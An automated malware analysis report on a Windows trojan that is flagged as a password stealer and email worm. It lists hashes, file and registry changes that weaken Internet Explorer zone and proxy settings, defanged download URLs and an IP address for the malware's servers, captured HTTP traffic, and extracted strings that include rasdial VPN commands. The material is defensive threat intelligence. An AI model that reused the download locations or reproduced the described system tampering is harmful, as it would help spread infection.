Trojan.Generic.14489098_789eee9815
Trojan.Generic.14489098 (B) (Emsisoft), Trojan.Generic.14489098 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 789eee98159c0032e03dcb7b6902d1a2
SHA1: 9d8723cff877153e632c3bbc6fcc0b83f0b69f6f
SHA256: 89c72134e46441fe2db0a421c0165bdd7497838a75fb7267f0b99d9bcf2a4f6f
SSDeep: 49152:Fq0Iz5k30VZ Ht1nUqgvkjBB1JvEj6FWYO:YJ5k30n HfnpgvktFWN
Size: 4677632 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-05-06 14:01:02
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1864
The Trojan injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1864 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\AdrjRtbAja.ini (204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\gx[1].htm (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\AdrjRtbAja.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
Registry activity
The process %original file name%.exe:1864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015060520150606]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015060520150606\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015060520150606]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015060520150606]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 F3 4F 42 42 57 41 8D 91 81 B3 96 54 0D 27 6A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015060520150606]
"CacheRepair" = "0"
"CachePrefix" = ":2015060520150606:"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| e5ce7ed8a90e3a60126909442736d473 | c:\nwzf1.51.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ChaoJiZ.Com
Product Name: ??Z???????
Product Version: 1.0.0.0
Legal Copyright: ChaoJiZ.Com ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ??Z???????
Comments: ??Z???????
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 781219 | 782336 | 4.54209 | 1e9117f228953da24e842a4bd10ebf13 |
| .rdata | 786432 | 3678920 | 3682304 | 4.45233 | b3b5f66e6624c757be18bb0fd4c2afcf |
| .data | 4468736 | 423307 | 114688 | 3.956 | 01d12614b1fab22313e8d8ccde3d0587 |
| .rsrc | 4894720 | 94004 | 94208 | 4.0946 | f14ed20bf71ce120527dbe09c65ff31c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://b9llivez6jyo3zs6m2nxj8ces1wjxrio.waf.aliyun.com/soft/nwzf/update.txt | |
| hxxp://b9llivez6jyo3zs6m2nxj8ces1wjxrio.waf.aliyun.com/ | |
| hxxp://b9llivez6jyo3zs6m2nxj8ces1wjxrio.waf.aliyun.com/soft/nwzf/gx.htm | |
| hxxp://down.chaojiz.com/nwzf1.51.exe | |
| hxxp://www.chaojiz.com/ | |
| hxxp://www.chaojiz.com/soft/nwzf/update.txt | |
| hxxp://www.chaojiz.com/soft/nwzf/gx.htm |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
Traffic
GET /nwzf1.51.exe HTTP/1.1
Host: down.chaojiz.com
Accept: */*
Referer: hXXp://down.chaojiz.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Content-Length: 7593984
Content-Type: application/octet-stream
Last-Modified: Thu, 04 Jun 2015 12:47:04 GMT
Accept-Ranges: bytes
ETag: "7d52448fc49ed01:298"
Server: Microsoft-IIS/6.0
Date: Fri, 05 Jun 2015 07:27:36 GMT
Connection: closeMZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......O...........
....p.......d.......d.......]...&...............'...=...............i.
......=...q...............%...................Rich....................
........PE..L....HpU.................P ...H.....4.(......` ...@.......
...................`y...............................................h.
D.....w..p............................................................
...............` .t............................text...GD ......P .....
............ ..`.rdata..H.<..` ...<..` .............@[email protected]...
[email protected]......`r.............@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.chaojiz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Fri, 05 Jun 2015 07:27:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Location: hXXp://VVV.chaojiz.com/index.html
Last-Modified: Tue, 05 May 2015 08:08:35 GMT
Content-Encoding: gzip920..............ko.W.3H...Tb[i=c.AH..j...K..P.Pe.=..u.3..8..|..5.<
6DK. *....iXmi..(.e...O..=w..}...iV .6..;...9..9......8=2.....X9..9...
..$.$.B..$..8.>89..)...h..5.XD.dU.b...2...S....X..u#-M..f(..%v.....
.K.......39U3#m......9C..B.s..................sy."...(.k....0...r.U..X
lH@R[.....(.yZ..X..~.%3.ab R.R.c...X*..V.;.k............. _......;dV..
..C.Dkr.G.I\*..br...K.......p..........|..*77...s..........>.v.....
...;..]............-...d/^.......uS.x..,|..'. ..{d/_.KW*.....e.y:.....
A........... ..m-...=.{.^....b.XpvV.Vn.z...hj...v6.9..%&.....^..>.Z
..X.<....1.....p..........K..-.$c.V..4H.f......l.F[%.$..8..L..bSL.p
.sX!2.....{[email protected].......$.T.........Wr^.8."..c.)$.I .V[)m....2
.o~/ O..* U...9.[<.4..0..T...@H........)D..C.........y{.2..}R...U:.
.-.....&...hR.g..s.T.7..X...i.....I.....{.g.D....9>O..r..f}$.g.eBWJ
H.T]V"....5..iY6_..i0.2...l.f....'..........X..x....i....J/..B<....
1T=.......)[email protected]. .5.FV.........ih..D.2.!4..M..t.v.C.J@s.....
..K2|@4.q...2Pk.X..Z.9..UI..`.hX.(..s.E.wa_%.~........M...X8.Y......E.
.......[;...0R.S]%TsG...G}...^... ..fm..-.O...4)...&....8.<...f!.h.
......gS^`...ru.......ruk......)..h.T.....h....O.7......RX.(.V.t...6.u
..e{s......k.....b...N.....X.dS.>.|;c.~i{.n.......... ...*a..f.i...
[email protected]\..YM.g;....lg.A...RAu3.kV....O....c.
'jw.V...>xQ{..7.M.d.|\.w6...!.n_..e.V'...p....C.q..7......l. _).4.`
C..M>.;{..&.r..f.}b.j.7..].^.4......K}sr.][email protected]/%...9......
....qu/[email protected]).I='.R...|.o|[email protected]..}<.}.d.e-s...../X...K..y.d..<<< skipped >>>
GET /soft/nwzf/update.txt HTTP/1.1
Accept: Accept text/html, application/xhtml xml, */*
Accept-Language: zh-CN
Referer: hXXp://VVV.chaojiz.com/soft/nwzf/update.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: VVV.chaojiz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Fri, 05 Jun 2015 07:27:34 GMT
Content-Type: text/plain
Content-Length: 204
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 04 Jun 2015 11:50:01 GMT
Accept-Ranges: bytes
ETag: "f7a0a996bc9ed01:298"[........]........=1.51..........=hXXp://down.chaojiz.com/nwzf1.51.exe
..........=....Z........ V1.51 ..................=hXXp://VVV.chaojiz.c
om/nwzf.html..........=hXXp://VVV.chaojiz.com/soft/nwzf/gx.htm..HTTP/1
.1 200 OK..Server: Tengine/2.0.2..Date: Fri, 05 Jun 2015 07:27:34 GMT.
.Content-Type: text/plain..Content-Length: 204..Connection: keep-alive
..Vary: Accept-Encoding..Last-Modified: Thu, 04 Jun 2015 11:50:01 GMT.
.Accept-Ranges: bytes..ETag: "f7a0a996bc9ed01:298"..[........]........
=1.51..........=hXXp://down.chaojiz.com/nwzf1.51.exe..........=....Z..
...... V1.51 ..................=hXXp://VVV.chaojiz.com/nwzf.html......
....=hXXp://VVV.chaojiz.com/soft/nwzf/gx.htm....
GET /soft/nwzf/gx.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.chaojiz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Fri, 05 Jun 2015 07:27:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Thu, 04 Jun 2015 11:40:24 GMT
Content-Encoding: gzip28b...............o.P...w.... .(..,....&...Lft.FB..Fg`N...\N.....\.Z..
\\.L..a......Y.......9..s~..........1.[ZX.:....t:.^...?<.G..#......
t.{ks.w.|A..C.....fs8.6y|n...e...X...w..v.f8.. ........^<..H.e...a&
;..tf%....:.k...e&.....F.X..=O..r.....o$r.,.P:...4G.0.]j.T=Z6%.!....Jj
....2.....<-..H......./.p4y..hT.._.S.%..a7..F..E..{........)......L
.N...k....`}9.....2K..AK.B`..0j.a...0.m...b..X....U#......8..b.D...[..
>..0....>..b.&.|.}.F.pd.......P66..,.d/....?.v.:..|.....Z.q..1..
3 !.e.P..!WW.4ULT...3V......>l.....3.A....g...$.T...}.....H.!.R?."?
[email protected],...B..` ..H..........5.O.k; .7.F.
.d .p8ww.&..e,._2..~..&.r..alshu..?...e.|.....0..HTTP/1.1 200 OK..Serv
er: Tengine/2.0.2..Date: Fri, 05 Jun 2015 07:27:36 GMT..Content-Type:
text/html..Transfer-Encoding: chunked..Connection: keep-alive..Vary: A
ccept-Encoding..Last-Modified: Thu, 04 Jun 2015 11:40:24 GMT..Content-
Encoding: gzip..28b...............o.P...w.... .(..,....&...Lft.FB..Fg`
N...\N.....\.Z..\\.L..a......Y.......9..s~..........1.[ZX.:....t:.^...
?<.G..#......t.{ks.w.|A..C.....fs8.6y|n...e...X...w..v.f8.. .......
.^<..H.e...a&;..tf%....:.k...e&.....F.X..=O..r.....o$r.,.P:...4G.0.
]j.T=Z6%.!....Jj....2.....<-..H......./.p4y..hT.._.S.%..a7..F..E..{
........)......L.N...k....`}9.....2K..AK.B`..0j.a...0.m...b..X....U#..
....8..b.D...[..>..0....>..b.&.|.}.F.pd.......P66..,.d/....?.v.:
..|.....Z.q..1..3 !.e.P..!WW.4ULT...3V......>l.....3.A....g...$.T..
.}.....H.!.R?."[email protected],...B..` ..H..<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
Kernel32.dll
shlwapi.dll
dbghelp.dll
kernel32.dll
ole32.dll
Comdlg32.dll
GetProcessHeap
|*.exe
(*.*)|*.*
hXXp://VVV.qym2.com/soft/nwzf/update.txt
hXXp://VVV.chaojiz.com/soft/nwzf/update.txt
/Nw_Config.ini
\data\setsoft.ini
hXXp://VVV.chaojiz.com
hXXp://VVV.chaojiz.com
_ChaoJiZ.exe
t%SVh
user32.dll
advapi32.dll
MsgWaitForMultipleObjects
RegCreateKeyA
RegOpenKeyA
RegEnumKeyA
RegCloseKey
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
{84A90340-1CE7-4C96-8FFC-FB0124DE9AD7}.ChaoJiZ
b6OjAvc1uo2i8unkFXdAvt6G8a5xuLevDPvwwv0472658500aiaQHGi9Gf5g0mAx6GKo1kXqOz37f5dQIuLlUZhSoiDvWkJ42HFtZu03QzkyQb51StxaeHcjChaojiZ.ComHNlRiTaCmka9
VVV.chaojiz.com
c:\chaojiz.com.pbk
\ChaoJiZ.Log
c:\log.txt
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\Parameters
window.baidu_time(
P1kAlMiG2Kb7FzP5tM1QBI6DSS92c31Apgjk9lVK7dmpdonxRWChaojiZ.Com
VVV.chaojiz.com
VVV.chaojiz.com_QQ472658500
PreferredPort=VPN3-0
PreferredDevice=WAN Miniport (PPTP)
CustomAuthKey=0
IpAddress=0.0.0.0
IpDnsAddress=0.0.0.0
IpDns2Address=0.0.0.0
IpWinsAddress=0.0.0.0
IpWins2Address=0.0.0.0
IpAssign=1
TcpWindowSize=0
PreSharedKey=
Port=VPN3-0
Device=WAN Miniport (PPTP)
PhoneNumber=182.92.171.116
>c:\log.txt
cmd.exe /c rasdial
|cmd.exe /c rasdial
Shell.Application
/disconnect>c:\log.txt
cmd.exe /c rasdial ChaoJiZ_Com /disconnect>c:\log1.txt
c:\log1.txt
<4,$?7/'
(3-!0,1'8"5.*2$
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
application/x-www-form-urlencoded
WinHttp.WinHttpRequest.5.1
SetClientCertificate
hXXp://
keye
pz?F%F
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
EnumChildWindows
EnumWindows
USER32.dll
GDI32.dll
KERNEL32.dll
gdiplus.dll
IMM32.dll
ShellExecuteA
SHELL32.dll
comdlg32.dll
WINSPOOL.DRV
ADVAPI32.dll
COMCTL32.dll
SHLWAPI.dll
WINMM.dll
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetCPInfo
exui.dll
exui_yuansukeyouziji_kuozhanjiekou
%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Broken pipe
Inappropriate I/O control operation
Operation not permitted
gdi32.dll
imm32.dll
shell32.dll
winspool.drv
comctl32.dll
winmm.dll
RASAPI32.dll
iphlpapi.dll
MPR.dll
WS2_32.dll
VERSION.dll
WinExec
GetWindowsDirectoryA
CreateDialogIndirectParamA
GetViewportOrgEx
GetViewportExtEx
OLEAUT32.dll
oledlg.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
eapi.fne
(link.ini)
extra_args=/NODEFAULTLIB:"LIBC.LIB"
extra_args=/NODEFAULTLIB:"EAPI_STATIC.LIB"
extra_args=/NODEFAULTLIB:"mysql_static.lib"
2:33544711
VVV.exui.cc
bbs.exui.cc =====
[email protected]
2014. 08.30.1
\lib\ex_ui\AttributeEditorexui.dll
.pi]\L}L
/.rE*L)k
ex_ui keye
msimg32.dll
.pK>NG`
P>f%S9e
.qn{\.mkBT
.qc]b
diTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:DDD122E7A584E2118FF1FE0FC3DAB2B7" xmpMM:DocumentID="xmp.did:A0B65855870011E2AFB69C04A7201614" xmpMM:InstanceID="xmp.iid:A0B65854870011E2AFB69C04A7201614" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22F24EC22D86E211815A8FDDD6268239" stRef:documentID="xmp.did:DDD122E7A584E2118FF1FE0FC3DAB2B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
11/15/11
VVV.meitu.com
[m.tT
4@{B96B3CAF-0728-11D3-9D7B-0000F81EF32E}" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C81E1B0B7A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C81E1B0A7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>w
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C81E1B0F7A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C81E1B0E7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C86695B87A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C86695B77A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>p
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C86695BC7A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C86695BB7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8D7CB70293206811822AD538802860B2" xmpMM:DocumentID="xmp.did:C86695C07A6711E28A59F49ABC758CF6" xmpMM:InstanceID="xmp.iid:C86695BF7A6711E28A59F49ABC758CF6" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9EA5B885657AE211B696CBD6FE121BFB" stRef:documentID="xmp.did:8D7CB70293206811822AD538802860B2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>G
